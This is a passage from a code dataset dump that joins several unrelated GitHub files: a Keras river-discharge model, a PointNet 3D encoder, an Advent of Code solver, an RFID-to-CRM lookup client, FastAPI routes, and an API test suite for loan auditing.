mask.drop('time') # time and basins dimension make no sense here\n return mask\n\ndef train(pipe, X_train, y_train, X_valid, y_valid):\n history = pipe.fit(X_train.values, y_train.values,\n model__validation_data=(X_valid.values, #.values, \n y_valid.values)) #.values.reshape(-1,1)))\n\n h = history.named_steps['model'].model.history\n\n # Plot training & validation loss value\n plt.figure()\n plt.plot(h.history['loss'], label='loss')\n plt.plot(h.history['val_loss'], label='val_loss')\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.legend() #['Train', 'Test'], loc='upper left')\n plt.gca().set_yscale('log')\n plt.show()\n\ndef add_shifted_predictors(ds, shifts, variables='all'):\n \"\"\"Adds additional variables to an array which are shifted in time.\n \n Parameters\n ----------\n ds : xr.Dataset\n shifts : list of integers\n variables : str or list\n \"\"\"\n if variables == 'all': \n variables = ds.data_vars\n \n for var in variables:\n for i in shifts:\n if i == 0: continue # makes no sense to shift by zero\n newvar = var+'-'+str(i)\n ds[newvar] = ds[var].shift(time=i)\n return ds\n\ndef preprocess_reshape_flowmodel(X_dis, y_dis):\n \"\"\"Reshape, merge predictor/predictand in time, drop nans.\"\"\"\n X_dis = X_dis.to_array(dim='time_feature') \n #print('X before feature-stacking', X_dis)\n X_dis = X_dis.stack(features=['latitude', 'longitude', 'time_feature'])\n #print('X before featuredrop', X_dis)\n Xar = X_dis.dropna('features', how='all')\n \n yar = y_dis\n yar = yar.drop(['latitude', 'longitude'])\n yar.coords['features'] = 'dis'\n \n #print('X, y before concat for time nan dropping', Xar, yar)\n Xy = xr.concat([Xar, yar], dim='features')\n Xyt = Xy.dropna('time', how='any') # drop them as we cannot train on nan values\n time = Xyt.time\n \n Xda = Xyt[:,:-1]\n yda = Xyt[:,-1]\n return Xda, yda, time\n\ndef add_time(vector, time, name=None):\n \"\"\"Converts arrays to xarrays with a time coordinate.\"\"\"\n return xr.DataArray(vector, dims=('time'), coords={'time': time}, name=name)\n\nclass FlowModel(object):\n def __init__(self, **kwargs):\n model = keras.models.Sequential()\n self.cfg = kwargs\n \n model.add(keras.layers.BatchNormalization())\n \n model.add(keras.layers.Dense(8,\n kernel_initializer=keras.initializers.Zeros(), \n #bias_initializer=keras.initializers.Constant(value=self.cfg.get('initialbias')),\n activation='relu')) #('sigmoid'))\n #model.add(Dropout(self.cfg.get('dropout')))\n #model.add(keras.layers.Dense(32))\n #model.add(keras.layers.Activation('sigmoid'))\n #model.add(Dropout(self.cfg.get('dropout')))\n #model.add(keras.layers.Dense(16))\n #model.add(keras.layers.Activation('sigmoid'))\n #model.add(Dropout(self.cfg.get('dropout')))\n #model.add(keras.layers.Dense(8))\n #model.add(keras.layers.Activation('sigmoid'))\n #model.add(Dropout(self.cfg.get('dropout')))\n model.add(keras.layers.Dense(1, activation='linear'))\n # bias_initializer=keras.initializers.Constant(value=9000)))\n \n #ha = self.cfg.get('hidden_activation')\n\n #for N_nodes in self.cfg.get('N_hidden_nodes'):\n # \n # model.add(hidden)\n # model.add(ha.copy())\n # \n # if self.cfg.get('dropout'):\n # model.add(Dropout(self.cfg.get('dropout')))#\n\n #outputlayer = keras.layers.Dense(1, activation='linear')\n\n #optimizer_name, options_dict = self.cfg.get('optimizer')\n #optimizer = getattr(keras.optimizers, optimizer_name)(**options_dict)\n #optimizer = keras.optimizers.SGD(lr=0.01)\n rmsprop = keras.optimizers.RMSprop(lr=.05)\n sgd = keras.optimizers.SGD(lr=0.05, decay=1e-6, momentum=0.8, nesterov=True)\n\n model.compile(loss=self.cfg.get('loss'), \n optimizer=rmsprop)\n self.model = model\n\n self.callbacks = [keras.callbacks.EarlyStopping(monitor='val_loss',\n min_delta=1, patience=10, verbose=0, mode='auto',\n baseline=None, restore_best_weights=True),\n keras.callbacks.ModelCheckpoint(self.cfg.get('filepath'), \n monitor='val_loss', verbose=0, save_best_only=True, \n save_weights_only=False, mode='auto', period=1),]\n\n def predict(self, Xda, name=None):\n a = self.model.predict(Xda.values).squeeze()\n return add_time(a, Xda.time, name=name)\n\n def fit(self, Xda, yda, **kwargs):\n return self.model.fit(Xda, yda.reshape(-1,1),\n epochs=self.cfg.get('epochs', None),\n batch_size=self.cfg.get('batch_size', None),\n callbacks=self.callbacks,\n verbose=0,\n **kwargs)\n\ndef create_FlowModel(filepath, initialdischarge):\n mlp_kws = dict(optimizer=('sgd', dict(lr=.05)),\n loss='mean_squared_error',\n #N_hidden_nodes=(4,4),\n #hidden_activation=keras.layers.Activation('sigmoid'), #keras.layers.ReLU(), #-LeakyReLU(alpha=0.3), #'relu',\n #output_activation='linear',\n #bias_initializer='random_uniform',\n batch_size=128,\n dropout=0.25,\n epochs=1000,\n filepath = filepath,\n initialbias = initialdischarge,\n )\n \n return Pipeline([#('scaler', StandardScaler()),\n #('pca', PCA(n_components=2)),\n ('model', FlowModel(**mlp_kws)),],\n verbose=False)\n\nstatic = xr.open_dataset('../data/danube/era5_slt_z_slor_lsm_stationary_field.nc')\n\n#era5 = xr.open_dataset('../data/usa/era5_lsp_cp_1981-2017_daysum.nc')\n#era5 = shift_time(era5, -dt.timedelta(hours=23))\n\nera5 = xr.open_dataset('../data/danube/era5_danube_pressure_and_single_levels.nc')\n\nglofas = read_glofas_danube()\n\nglofas = glofas.isel(time=slice(0, 365*10)) # just to reduce the amount of data\n\nif 'tp' in era5:\n tp = era5['tp']\nelse:\n tp = (era5['cp']+era5['lsp'])*1000\n tp.name = 'total precip [mm]'\ntp = tp.interp(latitude=glofas.latitude,\n longitude=glofas.longitude)\n\nshifts = range(1,4)\nX = add_shifted_predictors(glofas, shifts, variables='all')\nX = X.drop('dis') # current dis is to be predicted, is not a feature\n\ny = glofas['dis'] # just this variable as dataarray\n\nN_train = 365*5\nN_valid = 365*1\n\nfm_path = '../models/flowmodel/danube/flowmodel_lat_lon.h5'\n\n#riverpoints = select_riverpoints(glofas)\ndanube_gridpoints = get_mask_of_basin(glofas['dis'].isel(time=0), 'Danube')\n\nplt.imshow(danube_gridpoints.astype(int))\nplt.show()\n\nmask_springs = glofas['dis'].isel(time=0)\nmask_springs.values[:] = 0.\n\n\nfor lon in danube_gridpoints.longitude:\n for lat in danube_gridpoints.latitude:\n #print(danube_gridpoints.sel(latitude=lat, longitude=lon))\n if danube_gridpoints.sel(latitude=lat, longitude=lon) == 1:\n \n lats, lons = sfloat(lat), sfloat(lon)\n modpath = fm_path.replace('lat', lats).replace('lon', lons)\n\n upstream = select_upstream(glofas, lat, lon, basin='Danube')\n\n N_upstream = int(upstream.sum())\n if N_upstream < 3:\n print(lats, lons, 'is spring.')\n mask_springs.loc[dict(latitude=lat, longitude=lon)] = 1.\n\n #plt.imshow(mask_springs.astype(int))\n #plt.title('springs')\n #plt.show()\n else:\n if not os.path.isfile(modpath):\n print(lats, lons, 'is danube river -> train flowmodel')\n plt.imshow(upstream.astype(int))\n plt.title(str(N_upstream)+' upstream points for '+lats+' '+lons)\n plt.show()\n \n plt.imshow(mask_springs.astype(int))\n plt.title('springs')\n plt.show()\n \n \n tp_box = tp.loc[dict(latitude=slice(lat+1.5, lat-1.5), \n longitude=slice(lon-1.5, lon+1.5))] \n noprecip = tp_box.mean(['longitude', 'latitude']) < 0.1\n\n Xt = X.where(noprecip, drop=True)\n Xt = Xt.where(upstream, drop=True)\n yt = y.sel(latitude=float(lat), longitude=float(lon))\n\n #print(Xt, upstream)\n Xda, yda, time = preprocess_reshape_flowmodel(Xt, yt)\n print(Xda.shape, yda.shape)\n \n X_train = Xda[:N_train,:] \n y_train = yda[:N_train] \n X_valid = Xda[N_train:N_train+N_valid,:] \n y_valid = yda[N_train:N_train+N_valid] \n\n print(X_train.shape, y_train.shape)\n print(X_valid.shape, y_valid.shape)\n initialdischarge = np.mean(y_train)\n pipe = create_FlowModel(modpath, initialdischarge)\n\n train(pipe, X_train, y_train, X_valid, y_valid)\n","repo_name":"AdrianAlpizar/PluMA-Jupyter","sub_path":"mlcombimodel1loop.py","file_name":"mlcombimodel1loop.py","file_ext":"py","file_size_in_byte":13865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8169819779","text":"#### 3D Vision reimplementation\n## Dusan, Daniil, Stefan\nimport torch\nimport torch.nn as nn\nfrom im2mesh.layers import ResnetBlockFC, Unet, FCPlanenet\nimport numpy as np\nfrom numpy import linalg as LA\nfrom torch_scatter import scatter_mean, scatter_max\nimport os\nimport re\n\ndef maxpool(x, dim=-1, keepdim=False):\n out, _ = x.max(dim=dim, keepdim=keepdim)\n return out\n \ndef ChangeBasis(plane_parameters, device = 'cuda'):\n # Input: Plane parameters (batch_size x L x 3) - torch.tensor dtype = torch.float32\n # Output: C_mat (batch_size x L x 4 x 3)\n # C_mat is stacked matrices of:\n # 1. Change of basis matrices (batch_size x L x 3 x 3)\n # 2. Normalizing constants (batch_size x L x 1 x 3)\n device = device\n\n batch_size, L, _ = plane_parameters.size()\n normal = plane_parameters.reshape([batch_size * L, 3]).float()\n normal = normal / torch.norm(normal, p=2, dim=1).view(batch_size * L, 1) #normalize\n normal = normal + 0.0001 # Avoid non-invertible matrix down the road\n\n basis_x = torch.tensor([1, 0, 0], dtype=torch.float32).repeat(batch_size*L,1).to(device)\n basis_y = torch.tensor([0, 1, 0], dtype=torch.float32).repeat(batch_size*L,1).to(device)\n basis_z = torch.tensor([0, 0, 1], dtype=torch.float32).repeat(batch_size*L,1).to(device)\n\n v = torch.cross(basis_z.to(device), normal)\n zero = torch.zeros([batch_size*L], dtype=torch.float32).to(device)\n skew = torch.zeros([batch_size*L, 3, 3], dtype=torch.float32).to(device)\n skew[range(batch_size*L), 0] = torch.stack([zero, -v[:,2], v[:,1]]).t()\n skew[range(batch_size * L), 1] = torch.stack([v[:,2], zero, -v[:,0]]).t()\n skew[range(batch_size * L), 2] = torch.stack([-v[:,1], v[:,0], zero]).t()\n\n idty = torch.eye(3).to(device)\n idty = idty.reshape((1, 3, 3))\n idty = idty.repeat(batch_size*L, 1, 1)\n dot = (1-torch.sum(normal*basis_z,dim=1)).unsqueeze(1).unsqueeze(2)\n div = torch.norm(v, p=2, dim=1)**2\n div = div.unsqueeze(1).unsqueeze(2)\n\n R = (idty + skew + torch.matmul(skew, skew) * dot / div)\n\n new_basis_x = torch.bmm(R, basis_x.unsqueeze(2))\n new_basis_y = torch.bmm(R, basis_y.unsqueeze(2))\n new_basis_z = torch.bmm(R, basis_z.unsqueeze(2))\n\n new_basis_matrix = torch.cat([new_basis_x, new_basis_y, new_basis_z], dim=2)\n\n C_inv = torch.inverse(new_basis_matrix)\n\n # Define normalization constant\n b_x = torch.abs(new_basis_x).squeeze(2)\n b_y = torch.abs(new_basis_y).squeeze(2)\n p_dummy = torch.tensor([1, 1, 1], dtype=torch.float32).repeat(batch_size*L,1).to(device)\n p_x = torch.sum(b_x*p_dummy,dim=1).unsqueeze(1) / torch.sum(b_x*b_x,dim=1).unsqueeze(1) * b_x\n p_y = torch.sum(b_y*p_dummy,dim=1).unsqueeze(1) / torch.sum(b_y*b_y,dim=1).unsqueeze(1)* b_y\n\n c_x = torch.norm(p_x, p=2, dim=1)\n c_y = torch.norm(p_y, p=2, dim=1)\n\n normalizer = torch.max(c_x, c_y).unsqueeze(1).unsqueeze(2).repeat(1,1,3)\n\n C_mat = torch.cat([C_inv, normalizer], dim=1)\n\n C_mat = C_mat.view(batch_size,L,4,3)\n\n return C_mat\n\n\nclass SimplePointnet(nn.Module):\n ''' PointNet-based encoder network. With plane training\n\n Args:\n c_dim (int): dimension of latent code c\n dim (int): input points dimension\n hidden_dim (int): hidden dimension of the network\n '''\n\n def __init__(self, c_dim=128, dim=3, hidden_dim=128, n_channels = 3):\n super().__init__()\n self.c_dim = c_dim\n\n self.fc_pos = nn.Linear(dim, 2*hidden_dim)\n self.fc_0 = nn.Linear(2*hidden_dim, hidden_dim)\n self.fc_1 = nn.Linear(2*hidden_dim, hidden_dim)\n self.fc_2 = nn.Linear(2*hidden_dim, hidden_dim)\n self.fc_3 = nn.Linear(2*hidden_dim, hidden_dim)\n self.fc_c = nn.Linear(hidden_dim, c_dim)\n\n self.actvn = nn.ReLU()\n self.pool = maxpool\n\n def forward(self, p):\n batch_size, T, D = p.size()\n\n\n # output size: B x T X F\n net = self.fc_pos(p)\n net = self.fc_0(self.actvn(net))\n pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())\n net = torch.cat([net, pooled], dim=2)\n\n net = self.fc_1(self.actvn(net))\n pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())\n net = torch.cat([net, pooled], dim=2)\n\n net = self.fc_2(self.actvn(net))\n pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())\n net = torch.cat([net, pooled], dim=2)\n\n net = self.fc_3(self.actvn(net))\n\n # Reducee to B x F\n net = self.pool(net, dim=1)\n\n c = self.fc_c(self.actvn(net))\n\n return c\n\n\nclass ResnetPointnet(nn.Module):\n # PointNet-based encoder network with ResNet blocks.\n\n # Args:\n # c_dim (int): dimension of latent code c\n # dim (int): input points dimension\n # hidden_dim (int): hidden dimension of the network\n # n_channels (int): number of planes for projection\n \n\n def __init__(self, c_dim=128, dim=3, hidden_dim=128, n_channels = 4, plane_param_file=\"normals.csv\", object=\"null\"):\n super().__init__()\n self.c_dim = c_dim\n self.hidden_dim = hidden_dim \n self.n_channels = n_channels\n\n self.file_name = str(plane_param_file)\n self.object = str(object)\n \n # For grid features\n self.fc_pos = nn.Linear(dim, 2*hidden_dim)\n self.block_0 = ResnetBlockFC(2*hidden_dim, hidden_dim)\n self.block_1 = ResnetBlockFC(2*hidden_dim, hidden_dim)\n self.block_2 = ResnetBlockFC(2*hidden_dim, hidden_dim)\n self.block_3 = ResnetBlockFC(2*hidden_dim, hidden_dim)\n self.block_4 = ResnetBlockFC(2*hidden_dim, hidden_dim)\n self.fc_c = nn.Linear(hidden_dim, c_dim)\n self.unet = Unet(hidden_dim)\n\n # For plane prediction\n self.fc_plane_net = FCPlanenet(n_dim=dim, n_channels=n_channels, hidden_dim=hidden_dim)\n self.fc_plane_hdim = nn.Linear(n_channels*3, hidden_dim)\n\n # Activation & pooling\n self.actvn = nn.ReLU()\n self.pool = maxpool\n \n is_cuda = torch.cuda.is_available()\n self.device = torch.device(\"cuda\" if is_cuda else \"cpu\")\n\n def forward(self, p):\n batch_size, T, D = p.size()\n \n\n # Grid features\n net = self.fc_pos(p)\n net = self.block_0(net)\n pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())\n net = torch.cat([net, pooled], dim=2)\n net = self.block_1(net)\n pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())\n net = torch.cat([net, pooled], dim=2)\n net = self.block_2(net)\n pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())\n net = torch.cat([net, pooled], dim=2)\n net = self.block_3(net)\n pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())\n net = torch.cat([net, pooled], dim=2)\n net = self.block_4(net) # batch_size x T x hidden_dim (T: number of sampled input points)\n\n net_pl = self.fc_plane_net(p)\n plane_parameters = net_pl.view(batch_size,-1,3) # batch_size x L x 3\n\n flatten_tensor = torch.flatten(plane_parameters)\n string = str(flatten_tensor)\n string = string.replace('\\n', ' ').replace(' ', '')\n sliced_string = re.findall(r'\\[(.*?)\\]', string)[0]\n st = self.object + \",\" + sliced_string + \"\\n\"\n\n if os.path.isfile(self.file_name) == False:\n log = open(self.file_name, \"w+\")\n log.write(st)\n print(\"{} normals appended to {}\".format(self.object, self.file_name))\n log.close()\n else:\n log = open(self.file_name, \"a\")\n log.write(st)\n print(\"{} normals appended to {}\".format(self.object, self.file_name))\n log.close()\n\n raise ValueError('Intentionally stop program here. No need to run full generation.')\n\n\n #eye_basis = torch.tensor([[1, 0, 0], [0, 1, 0], [0, 0, 1]]).to(self.device)\n #canonical_planes = torch.cat(batch_size*[eye_basis]).view(batch_size, 3, 3)\n #plane_parameters = canonical_planes\n\n C_mat = ChangeBasis(plane_parameters, device = self.device) # batch_size x L x 4 x 3\n net_pl = self.fc_plane_hdim(self.actvn(net_pl))\n net_pl = net_pl.unsqueeze(1) # batch_size x 1 x hidden_dim\n\n # Combine net and net_pl\n net = net + net_pl # to allow backpropagation to net_pl \n\n # Create grid feature\n grid_res = 64\n max_dim = 0.55\n H = grid_res\n W = grid_res\n interval = float(2 / (grid_res-1))\n\n c = torch.zeros([batch_size, self.n_channels, W, H, self.hidden_dim], device=self.device)\n\n for l in range(C_mat.size()[1]):\n p_project = torch.div(p, max_dim)\n p_project = torch.transpose(p_project, 2,1)\n p_project = torch.bmm(C_mat[:,l,:3], p_project)\n p_project = torch.transpose(p_project, 2,1)\n\n p_project = p_project / (C_mat[:,l,3,0]+0.05).unsqueeze(1).unsqueeze(2) # divide by normalizer so that range is [-1,1]\n p_project = p_project[:,:,:2]\n xy_index = (p_project + 1) / interval\n xy_index[xy_index>=(grid_res-1)] = grid_res-1-0.1\n xy_index[xy_index<0] = 0\n xy_index = torch.round(xy_index).int()\n cell_index = xy_index[:,:,0] + H * xy_index[:,:,1]\n cell_index = cell_index.unsqueeze(2).long()\n out = net.new_zeros((batch_size, W*H, self.hidden_dim)).to(self.device)\n out, _ = scatter_max(net, cell_index, dim=1, out=out)\n c[:,l,] = out.view(batch_size, H, W, self.hidden_dim)\n\n\n # Reshape for U-Net\n _, L, H, W, d_dim = c.size()\n c = c.view([batch_size * L, H, W, d_dim])\n c = c.permute(0, 3, 1, 2)\n\n # U-Net\n c = self.unet(c)\n c = c.permute(0, 2, 3, 1)\n c = c.view(batch_size, L, H, W, self.c_dim)\n\n return c, C_mat\n","repo_name":"daniil-777/dynamic_geo_convolutional_onet","sub_path":"src/visualisation_planes/im2mesh/encoder/fc_point_net.py","file_name":"fc_point_net.py","file_ext":"py","file_size_in_byte":9907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"41110586075","text":"#!/usr/bin/env python3\n\nfrom os.path import dirname, realpath\ndir_path = dirname(realpath(__file__))\n\nwith open(f'{dir_path}/input') as f:\n puzzle_input = f.read().split()\n\ndef parse_input():\n return [[puzzle_input[i], int(puzzle_input[i+1])] for i in range(0, len(puzzle_input), 2)]\n\nclass VM:\n def __init__(self, insts=[]):\n self.insts = insts\n\n def run(self):\n acc = 0\n header = 0\n l = len(self.insts)\n\n seen = set()\n\n while header != l:\n inst = self.insts[header]\n\n if header in seen:\n return False, acc\n\n seen.add(header)\n\n if inst[0] == 'acc':\n acc += inst[1]\n elif inst[0] == 'jmp':\n header += inst[1] - 1\n\n header += 1\n\n return True, acc\n\ndef part1():\n pi = parse_input()\n\n return VM(pi).run()[1]\n\ndef part2():\n pi = parse_input()\n\n replace = {'nop': 'jmp', 'jmp': 'nop'}\n\n vm = VM(pi)\n\n for i in range(len(pi)):\n inst = pi[i]\n\n if inst[0] in replace:\n vm.insts[i][0] = replace[inst[0]]\n\n status, res = vm.run()\n\n if(status):\n return res\n\n vm.insts[i][0] = replace[inst[0]]\n\n\ndef main():\n part1_res = part1()\n print(f'Part 1: {part1_res}')\n\n part2_res = part2()\n print(f'Part 2: {part2_res}')\n\nif __name__ == '__main__':\n main()\n","repo_name":"tannerstephens/advent-of-code","sub_path":"2020/day8/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"583820636","text":"\nimport requests\nimport config\nimport unidecode\n\n\n\n\ndef git_version ():\n # https://api.github.com/repos/{owner}/{repo}/releases/latest\n response = requests.get(\"https://api.github.com/repos/TomasSpusta/pipi_reader/releases/latest\")\n config.git_release = response.json()[\"name\"]\n print (config.git_release)\n \ndef crm_request_rfid ():\n #scanned_rfid = str (scanned_rfid)\n payload = {\"rfid\":config.card_id}\n \n try:\n crm_response = requests.post (\"https://crm.api.ceitec.cz/get-contact-by-rfid\", json = payload)\n crm_data = crm_response.json()\n #print (crm_data)\n \n if len (crm_data) == 0:\n config.in_database = False\n print (\"User is not in database\") # User is not in CRM database so we can continue with the process\n \n else: \n config.in_database = True\n user_name = crm_data[0][\"firstname\"]\n config.user_full_name = crm_data[0][\"full_name\"]\n config.user_name = unidecode.unidecode (user_name)\n config.user_id = crm_data[0][\"contactid\"]\n #print (config.user_name)\n #print (\"User ID is {} and User's first name is {}\" .format(config.user_id, config.user_name))\n \n except Exception as e:\n print(\"Error in crm_request_rfid:\")\n print (e)\n \ndef crm_send_dataset ():\n payload = {\"vutid\":config.vut_id, \"rfid\":config.card_id}\n\n try:\n crm_response = requests.patch (\"https://crm.api.ceitec.cz/save-rfid-by-vutid\", json = payload)\n crm_data = crm_response.json()\n \n print (crm_data)\n print (crm_response.status_code)\n \n if crm_response.status_code == 200:\n print (\"Writing to database successful\")\n else:\n print (\"Writing to database failed.\")\n return crm_response.status_code\n \n except Exception as e:\n print(\"Error in crm_request_rfid:\")\n print (e)\n ","repo_name":"TomasSpusta/pipi_scan","sub_path":"web_requests.py","file_name":"web_requests.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70049166642","text":"def solution(answer_sheet, sheets):\n length = len(answer_sheet)\n dic = {}\n for i in range(length):\n print(answer_sheet[i])\n bucket = []\n for j in range(len(sheets)):\n print(sheets[j][i])\n if answer_sheet[i] != sheets[j][i]:\n bucket.append((j, i))\n\n print(bucket)\n for k in range(len(bucket) - 1):\n for kk in range(k + 1, len(bucket)):\n\n if sheets[bucket[k][0]][bucket[k][1]] == sheets[bucket[kk][0]][bucket[kk][1]]:\n if dic.get((bucket[k][0], bucket[kk][0])) is None:\n dic[(bucket[k][0], bucket[kk][0])] = 1\n else:\n dic[(bucket[k][0], bucket[kk][0])] += 1\n print()\n print(dic)\n answer = -1\n return answer\n\n\nsolution(\"4132315142\", [\"3241523133\", \"4121314445\", \"3243523133\", \"4433325251\", \"2412313253\"])","repo_name":"SINHOLEE/Algorithm","sub_path":"python/프로그래머스/라인2.py","file_name":"라인2.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"44448523604","text":"class Animal:\n att_mod = 4\n def __init__(self, legs, flies):\n self.leg = legs\n self.flies = flies\n self.has_fur = True\n\n def had_birthday(self):\n print(self.att_mod)\n\nclass Insect(Animal):\n att_mod = 6 # Insect.att_mod\n def __init__(self, l, bool):\n super().__init__(l, bool)\n self.leg = l * 2\n self.flies = bool\n\n\na = Animal(4, True)\ni = Insect(6, False)\na.had_birthday() # Animal.had_birthday(a)\ni.had_birthday() # Animal.had_birthday(i)","repo_name":"LhallLhall/EverCraft","sub_path":"src/shtuff.py","file_name":"shtuff.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20983626631","text":"from fastapi import UploadFile,File,Depends\nfrom starlette.requests import Request\nfrom src.interfaces import FasAPIAdapter\nfrom .salesman import salesman,adapter,oauth2_token,salesman_token\n\n\n# route http://127.0.0.1:8000/api/v1/salesman/acount/add-marker-position\n@salesman.post(\"/acount/add-marker-position\",tags=['salesman'])\nasync def post_position(form_data:Request,token:str=Depends(oauth2_token)):\n id_salesman=await salesman_token.get_current_user(token)\n data=await form_data.form()\n return await adapter.post_position(id_salesman,data)\n \n#route http://127.0.0.1:8000/api/v1/salesman/acount/get-marker-position\n@salesman.get(\"acount/get-marker-position\",tags=['salesman'])\nasync def get_marker_position(token:str=Depends(oauth2_token)):\n id_salesman=await salesman_token.get_current_user(token)\n return await adapter.get_markers(id_salesman)\n\n#route http://127.0.0.1:8000/api/v1/salesman/acount/update-marker-position\n@salesman.put(\"/acount/update-marker-position\",tags=['salesman'])\nasync def update_marker_position(form_data:Request,token:str=Depends(oauth2_token)):\n id_salesman=await salesman_token.get_current_user(token)\n data=await form_data.form()\n return await adapter.update_marker_position(id_salesman,data)\n","repo_name":"fredhmacau/Yolisa-Project","sub_path":"YOLISA/backend/app/src/infra/http/routes/salesman/salesman_in_map.py","file_name":"salesman_in_map.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10466547085","text":"\"\"\"\n审核接口:管理员去审核\n\n审核的前置条件:\n 1、管理员登录(类级别的前置)\n 2、普通用户的角色添加项目\n 1)、普通用户登录(类级别的前置)\n 2)、创建一个项目(用例级别的前置)\n\"\"\"\nimport os\nimport unittest\nimport requests\nfrom jsonpath import jsonpath\nfrom unittestreport import ddt, list_data\nfrom common.handle_excel import HandleExcel\nfrom common.handle_path import DATA_DIR\nfrom common.handle_conf import conf\nfrom common.handle_log import stt_log\nfrom common.handle_mysql import HandleDB\nfrom common.handle_sign import HandleSign\nfrom common.tools import replace_data\nfrom testcases.fixture import BaseTest\n\n@ddt\nclass TestAudit(unittest.TestCase,BaseTest):\n excel = HandleExcel(os.path.join(DATA_DIR, 'jiekou.xlsx'), 'audit')\n cases = excel.read_data()\n db = HandleDB()\n\n @classmethod\n def setUpClass(cls) -> None:\n cls.admin_login()\n cls.user_login()\n # url = conf.get('env', 'base_url') + '/member/login'\n # # -------------管理员登陆----------------------------\n # \"\"\"用例类的前置方法:登录提取token\"\"\"\n # # 1、请求登录接口,进行登录\n #\n # params = {\n # \"mobile_phone\": conf.get('test_data', 'admin_mobile'),\n # \"pwd\": conf.get('test_data', 'admin_pwd')\n # }\n # headers = eval(conf.get('env', 'headers'))\n # responce = requests.post(url=url, headers=headers, json=params)\n # res = responce.json()\n # # 2、登录成功之后再去提取token\n # token = jsonpath(res, '$..token')[0]\n # # 将token添加到请求头中\n # headers['Authorization'] = 'Bearer ' + token\n # # 保存含有token的请求头为类属性\n # cls.admin_headers = headers\n # # setattr(TestRecharge,'headers',headers)\n # # 3、提取用户的id给充值接口使用\n # cls.admin_member_id = jsonpath(res, '$..id')[0]\n # # -------------普通用户登陆----------------------------\n # # 1、请求登录接口,进行登录\n # params = {\n # \"mobile_phone\": conf.get('test_data', 'mobile'),\n # \"pwd\": conf.get('test_data', 'pwd')\n # }\n # headers = eval(conf.get('env', 'headers'))\n # responce = requests.post(url=url, headers=headers, json=params)\n # res = responce.json()\n # # 2、登录成功之后再去提取token\n # token = jsonpath(res, '$..token')[0]\n # # 将token添加到请求头中\n # headers['Authorization'] = 'Bearer ' + token\n # # 保存含有token的请求头为类属性\n # cls.headers = headers\n # # setattr(TestRecharge,'headers',headers)\n # # 3、提取用户的id给充值接口使用\n # cls.member_id = jsonpath(res, '$..id')[0]\n\n def setUp(self) -> None:\n self.add_project()\n\n @list_data(cases)\n def test_audit(self, item):\n # 第一步:准备数据\n url = conf.get('env', 'base_url') + item['url']\n # ========================动态替换参数=========================\n # 动态处理需要进行替换的参数\n # item['data']=item['data'].replace('#member_id#',str(self.member_id))\n item['data'] = replace_data(item['data'], TestAudit)\n # print(item['data'])\n params = eval(item['data'])\n # 000000000000000000V3版本的改动00000000000000000000\n par_sign = HandleSign.generate_sign(self.admin_token)\n print(\"签名和时间戳:\", par_sign)\n params.update(par_sign)\n print(params)\n # 0000000000000000000V3版本的改动000000000000000000000000000\n # ===========================================================\n expected = eval(item['expected'])\n method = item['method'].lower()\n # 调用接口之前:查询数据库该用户的项目数量\n sql = 'SELECT status FROM futureloan.loan WHERE id={}'.format(self.loan_id)\n start_status = self.db.find_one(sql)\n print(\"调用项目前的状态:\", start_status)\n # 第二步:发送请求,获取接口返回的实际结果\n response = requests.request(method=method, url=url, headers=self.admin_headers, json=params)\n res = response.json()\n # 调用接口之后:查询数据库该用户的项目数量\n end_status = self.db.find_one(sql)\n print(\"调用项目后的状态:\", end_status)\n print(self.loan_id)\n # add_id = str(self.db.find_count(sql)[0])\n # print(\"项目id为:\", add_id)\n # 判断是否是审核通过的用例,并且审核成功,如果是则保存项目id为审核通过的项目id\n if item['title']=='审核通过' and res['msg']=='OK':\n TestAudit.pass_loan_id=params['loan_id']\n # 第三步;断言\n print(\"预期结果:\", expected)\n print(\"实际结果:\", res)\n try:\n # 断言code和msg字段是否一致\n # self.assertEqual(expected['code'],res['code'])\n # self.assertEqual(expected['msg'], res['msg'])\n self.assertDictIn(expected, res)\n # =====================读取excel中有标记成功的==============================\n # 根据添加项目是否成功,来对数据库进分别的校验\n if res['msg'] == \"OK\":\n # 注册成功\n self.assertNotEqual(start_status, end_status)\n print('审核通过或不通过')\n else:\n self.assertEqual(start_status, end_status)\n print('审核错误')\n except AssertionError as e:\n # 记录日志\n stt_log.error(\"用例--【{}】---执行失败\".format(item['title']))\n # stt_log.error(e)\n stt_log.exception(e)\n # 回写结果到excel(根据公司中实际需求来决定用例结果写不写到excel中)#注:回写excel需要花费大量的时问\n raise e\n else:\n stt_log.info(\"用例--【{}】---执行成功\".format(item['title']))\n\n def assertDictIn(self, expected, res):\n \"\"\"字典成员运算的逻辑\"\"\"\n for k, v in expected.items():\n if res.get(k) == v:\n pass\n else:\n raise AssertionError(\"{} not in {}\".format(expected, res))","repo_name":"stt1234567/py35_21day_project","sub_path":"testcases/test_06audit.py","file_name":"test_06audit.py","file_ext":"py","file_size_in_byte":6389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"832540801","text":"\"\"\"Runs experiments.\"\"\"\n\nimport argparse\nfrom copy import deepcopy\nimport os\n\nimport torch\n\nfrom train import train, train_many\nfrom parse_config import parse_config\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\ndef get_checkpoints(save_dir: str, model_names: list[str], models: list[torch.nn.Module], \n optimizers: 